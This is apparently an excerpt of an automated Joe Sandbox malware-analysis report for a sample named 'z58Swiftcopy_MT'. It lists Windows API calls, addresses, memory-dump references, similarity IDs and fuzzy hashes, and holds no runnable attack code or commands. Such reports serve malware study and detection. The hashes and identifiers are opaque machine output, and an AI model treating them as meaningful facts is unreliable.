                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3550944819-0
                                                                                                                                                                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$free
                                                                                                                                                                                                                                      • String ID: g4@
                                                                                                                                                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                                                                                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: sqlite_master
                                                                                                                                                                                                                                      • API String ID: 438689982-3163232059
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3917621476-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 822687973-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,762CDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,762CDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                                                                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Item
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3888421826-0
                                                                                                                                                                                                                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                                                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                                                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3727323765-0
                                                                                                                                                                                                                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                                                                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2754987064-0
APIs
  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
• SetBkMode.GDI32(?,00000001), ref: 004143A2
• SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
• SetTextColor.GDI32(?,00C00000), ref: 004143BE
• GetStockObject.GDI32(00000000), ref: 004143C6
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
• String ID:
• API String ID: 764393265-0
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: Time$System$File$LocalSpecific
• String ID:
• API String ID: 979780441-0
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
